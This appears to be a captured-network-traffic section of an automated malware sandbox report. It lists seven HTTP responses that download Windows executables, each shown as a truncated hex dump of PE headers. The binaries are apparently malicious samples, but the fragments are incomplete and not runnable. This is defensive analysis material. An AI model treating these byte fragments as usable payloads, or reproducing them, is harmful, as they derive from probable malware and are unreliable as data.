      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Jun 2021 20:22:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 23 Jun 2021 16:47:38 GMTETag: "ae600-5c571aa0f41c6"Accept-Ranges: bytesContent-Length: 714240Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 57 0c 8a d1 36 62 d9 d1 36 62 d9 d1 36 62 d9 cf 64 f7 d9 f0 36 62 d9 cf 64 e1 d9 50 36 62 d9 cf 64 e6 d9 e8 36 62 d9 f6 f0 19 d9 d4 36 62 d9 d1 36 63 d9 72 36 62 d9 cf 64 e8 d9 d0 36 62 d9 cf 64 f6 d9 d0 36 62 d9 cf 64 f3 d9 d0 36 62 d9 52 69 63 68 d1 36 62 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 02 f8 96 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 7a 08 00 00 16 4c 00 00 00 00 00 d0 13 00 00 00 10 00 00 00 90 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 54 00 00 04 00 00 c8 34 0b 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 38 09 00 3c 00 00 00 00 30 53 00 88 21 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 54 00 4c 1d 00 00 b0 92 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 08 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 78 08 00 00 10 00 00 00 7a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 48 b6 00 00 00 90 08 00 00 b8 00 00 00 7e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 da 49 00 00 50 09 00 00 20 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 21 01 00 00 30 53 00 00 22 01 00 00 56 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 6d 00 00 00 60 54 00 00 6e 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Jun 2021 20:22:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 23 Jun 2021 13:10:22 GMTETag: "978a0-5c56ea104518e"Accept-Ranges: bytesContent-Length: 620704Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 91 04 d3 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 9a 06 00 00 b0 02 00 00 00 00 00 7e b9 06 00 00 20 00 00 00 c0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 09 00 00 02 00 00 66 62 0a 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c b9 06 00 4f 00 00 00 00 c0 06 00 58 ac 02 00 00 00 00 00 00 00 00 00 00 4c 09 00 a0 2c 00 00 00 80 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 99 06 00 00 20 00 00 00 9a 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 ac 02 00 00 c0 06 00 00 ae 02 00 00 9c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 09 00 00 02 00 00 00 4a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 b9 06 00 00 00 00 00 48 00 00 00 02 00 05 00 70 02 06 00 bc b6 00 00 03 00 00 00 62 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 e8 00 36 99 20 94 ff f3 1e ac 6e 52 ef e1 af 0b 82 ef 88 e9 fe b9 c4 77 62 29 26 f6 ed 24 ad 3e c6 ef d6 ae c7 68 ee fd 6a 4e 17 6a 2b 7c cb e5 fa 82 f9 6b 32 5b e3 9a ce 97 4b f5 95 be d9 bc df 72 d5 74 b7 d6 b4 b7 c4 37 1c 4d f1 2f d6 e6 f3 45 89 89 71 76 a4 b4 31 21 1a 31 cb 8a 19 ae d3 fd 6f 85 ea 0e 52 4e b7 c4 75 76 b4 12 8e bc 5f 35 f0 3e ed 1a 28 06 5a 0a 75 fc 61 1b cf 40 39 db c0 b5 dc f0 06 1b bf f5 ff c2 93 f8 b2 45 e9 bf 69 f1 14 6d 6b b1 37 08 ff 61 ce 1a 09 7f bf 38 81 9a 63 9e 98 c5 f3 70 81 94 c8 b2 b7 99 2f 2b 37 47 6a bf f3 f0 8a 83 e0 e7 c3 fd 33 eb 98 8d 51 79 62 be 59 cc af 94 69 38 a5 b7 84 23 74 fb 0f 96 68 0d 17 96 f3 c5 fa 9c ef 7e 39 ab 1a 2a fb f6 02 4b 00 d7 62 61 59 a9 a3 9f e1 0f e1 0e 88 6a 2b 1c 57 48 69 45 2e 69 6a 57 1f 8e 28 3f 09 b0 79 23 47 15 eb 7f ae 79 d7 5b 55 19 c2 73 f3 3e 67 4c e2 49 29 b7 31 ad 10 b3 e1 4c c4 67 3e 57 d6 27 94 d7 5d ac 64 ec d3 ec 08 9a e3 4b fa 77 f2 bf 28 f9 48 3d fa 69 e3 94 37 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 23 Jun 2021 20:22:15 GMTContent-Type: application/x-msdos-programContent-Length: 357376Connection: keep-aliveKeep-Alive: timeout=3Last-Modified: Wed, 23 Jun 2021 20:22:01 GMTETag: "57400-5c574a8c55e52"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 49 ba 11 89 0d db 7f da 0d db 7f da 0d db 7f da 13 89 ea da 2c db 7f da 13 89 fc da 8c db 7f da 13 89 fb da 34 db 7f da 2a 1d 04 da 08 db 7f da 0d db 7e da ad db 7f da 13 89 f5 da 0c db 7f da 13 89 ed da 0c db 7f da 13 89 eb da 0c db 7f da 13 89 ee da 0c db 7f da 52 69 63 68 0d db 7f da 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff e4 32 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 24 03 00 00 fa 4b 00 00 00 00 00 d0 13 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 4f 00 00 04 00 00 55 c6 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 f4 03 00 4e 00 00 00 d4 e6 03 00 3c 00 00 00 00 e0 4d 00 30 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 4e 00 4c 1d 00 00 a0 42 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 dd 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 23 03 00 00 10 00 00 00 24 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ae b4 00 00 00 40 03 00 00 b6 00 00 00 28 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 da 49 00 00 00 04 00 00 20 00 00 00 de 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 0b 01 00 00 e0 4d 00 00 0c 01 00 00 fe 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 69 00 00 00 f0 4e 00 00 6a 00 00 00 0a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Jun 2021 20:22:15 GMTServer: ATSLast-Modified: Wed, 23 Jun 2021 19:36:38 GMTAccept-Ranges: bytesContent-Length: 13098974Cache-Control: max-age=5Content-Type: application/x-msdownloadEtag: "c7dfde-5c57406785ffd"Expires: Wed, 23 Jun 2021 20:22:20 GMTAge: 0Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c5 85 97 56 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 19 00 8c 00 00 00 96 00 00 00 ae 01 00 5d 43 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 05 00 00 04 00 00 97 ff 01 00 02 00 00 80 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 98 12 00 00 00 10 04 00 70 bd 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 8b 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 30 60 2e 64 61 74 61 00 00 00 e0 00 00 00 00 a0 00 00 00 02 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 d8 69 00 00 00 b0 00 00 00 6a 00 00 00 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 00 ad 01 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 98 12 00 00 00 d0 02 00 00 14 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 6e 64 61 74 61 00 00 00 20 01 00 00 f0 02 00 00 04 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 73 72 63 00 00 00 70 bd 01 00 00 10 04 00 00 be 01 00 00 14 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Jun 2021 20:22:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 23 Jun 2021 16:37:16 GMTETag: "5ab70-5c57184f6db5b"Accept-Ranges: bytesContent-Length: 371568Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 75 46 84 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 8c 05 00 00 08 00 00 00 00 00 00 f6 a9 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 06 00 00 04 00 00 94 73 06 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 a9 05 00 4f 00 00 00 00 c0 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 98 05 00 70 13 00 00 00 e0 05 00 0c 00 00 00 88 a9 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fc 89 05 00 00 20 00 00 00 8c 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 02 00 00 00 c0 05 00 00 04 00 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 04 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Jun 2021 20:22:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 23 Jun 2021 18:43:40 GMTETag: "69e00-5c57349049fd0"Accept-Ranges: bytesContent-Length: 433664Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 57 0c 8a d1 36 62 d9 d1 36 62 d9 d1 36 62 d9 cf 64 f7 d9 f0 36 62 d9 cf 64 e1 d9 50 36 62 d9 cf 64 e6 d9 e8 36 62 d9 f6 f0 19 d9 d4 36 62 d9 d1 36 63 d9 72 36 62 d9 cf 64 e8 d9 d0 36 62 d9 cf 64 f6 d9 d0 36 62 d9 cf 64 f3 d9 d0 36 62 d9 52 69 63 68 d1 36 62 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 82 15 d1 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 4a 04 00 00 fe 4b 00 00 00 00 00 d0 13 00 00 00 10 00 00 00 60 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 50 00 00 04 00 00 59 11 07 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 08 05 00 3c 00 00 00 00 00 4f 00 30 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 50 00 4c 1d 00 00 b0 62 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 48 04 00 00 10 00 00 00 4a 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 48 b6 00 00 00 60 04 00 00 b8 00 00 00 4e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 da 49 00 00 20 05 00 00 20 00 00 00 06 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 0b 01 00 00 00 4f 00 00 0c 01 00 00 26 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6a 6a 00 00 00 10 50 00 00 6c 00 00 00 32 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Jun 2021 20:22:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 23 Jun 2021 10:06:05 GMTETag: "101918-5c56c0dfd8fbc"Accept-Ranges: bytesContent-Length: 1055000Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e7 f8 d2 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 3a 0d 00 00 b0 02 00 00 00 00 00 be 58 0d 00 00 20 00 00 00 60 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 10 00 00 02 00 00 1c 25 10 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 58 0d 00 4b 00 00 00 00 60 0d 00 78 ac 02 00 00 00 00 00 00 00 00 00 00 ec 0f 00 18 2d 00 00 00 20 10 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 38 0d 00 00 20 00 00 00 3a 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 78 ac 02 00 00 60 0d 00 00 ae 02 00 00 3c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 10 00 00 02 00 00 00 ea 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 58 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 08 74 0c 00 68 e4 00 00 03 00 00 00 90 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 e8 00 36 99 20 94 ff f3 1e ac 6e 52 ef e1 af 0b 82 ef 88 e9 fe b9 c4 77 62 29 26 f6 ed 24 ad 3e c6 ef d6 ae c7 68 ee fd 6a 4e 17 6a 2b 7c cb e5 fa 82 f9 6b 32 5b e3 9a ce 97 4b f5 95 be d9 bc df 72 d5 74 b7 d6 b4 b7 c4 37 1c 4d f1 2f d6 e6 f3 45 89 89 71 76 a4 b4 31 21 1a 31 cb 8a 19 ae d3 fd 6f 85 ea 0e 52 4e b7 c4 75 76 b4 12 8e bc 5f 35 f0 3e ed 1a 28 06 5a 0a 75 fc 61 1b cf 40 39 db c0 b5 dc f0 06 1b bf f5 ff c2 93 f8 b2 45 e9 bf 69 f1 14 6d 6b b1 37 08 ff 61 ce 1a 09 7f bf 38 81 9a 63 9e 98 c5 f3 70 81 94 c8 b2 b7 99 2f 2b 37 47 6a bf f3 f0 8a 83 e0 e7 c3 fd 33 eb 98 8d 51 79 62 be 59 cc af 94 69 38 a5 b7 84 23 74 fb 0f 96 68 0d 17 96 f3 c5 fa 9c ef 7e 39 ab 1a 2a fb f6 02 4b 00 d7 62 61 59 a9 a3 9f e1 0f e1 0e 88 6a 2b 1c 57 48 69 45 2e 69 6a 57 1f 8e 28 3f 09 b0 79 23 47 15 eb 7f ae 79 d7 5b 55 19 c2 73 f3 3e 67 4c e2 49 29 b7 31 ad 10 b3 e1 4c c4 67 3e 57 d6 27 94 d7 5d ac 64 ec d3 ec 08 9a e3 4b fa 77 f2 bf 28 f9 48 3d fa 69 e3 94 37
